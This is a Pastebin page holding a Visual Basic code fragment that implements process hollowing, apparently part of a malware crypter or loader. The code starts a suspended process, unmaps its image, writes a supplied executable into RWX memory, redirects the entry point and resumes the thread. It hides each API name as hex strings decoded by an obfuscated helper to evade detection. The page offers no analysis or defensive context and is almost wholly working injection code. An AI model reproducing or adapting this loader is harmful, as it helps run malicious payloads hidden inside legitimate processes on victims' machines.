Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 'kernel32
- lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332"))
- 'ntdll
- lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C"))
- If sHost = vbNullString Then
- sHost = Space(260)
- 'GetModuleFileNameW
- lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557"))
- Invoke lMod, App.hInstance, StrPtr(sHost), 260
- End If
- With tIMAGE_NT_HEADERS.OptionalHeader
- tSTARTUPINFO.cb = Len(tSTARTUPINFO)
- 'CreateProcessW
- lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357"))
- Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)
- 'NtUnmapViewOfSection
- lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E"))
- Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase
- 'VirtualAllocEx
- lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578"))
- Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
- 'NtWriteVirtualMemory
- lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279"))
- Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0
- For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
- CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER)
- Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
- Next i
- tCONTEXT.ContextFlags = CONTEXT_FULL
- 'NtGetContextThread
- lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164"))
- Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
- 'NtWriteVirtualMemory
- lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279"))
- Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0
- tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint
- 'NtSetContextThread
- lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164"))
- Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
- 'NtResumeThread
- lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164"))
- Invoke lMod, tPROCESS_INFORMATION.hThread, 0
- hProc = tPROCESS_INFORMATION.hProcess
- End With
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement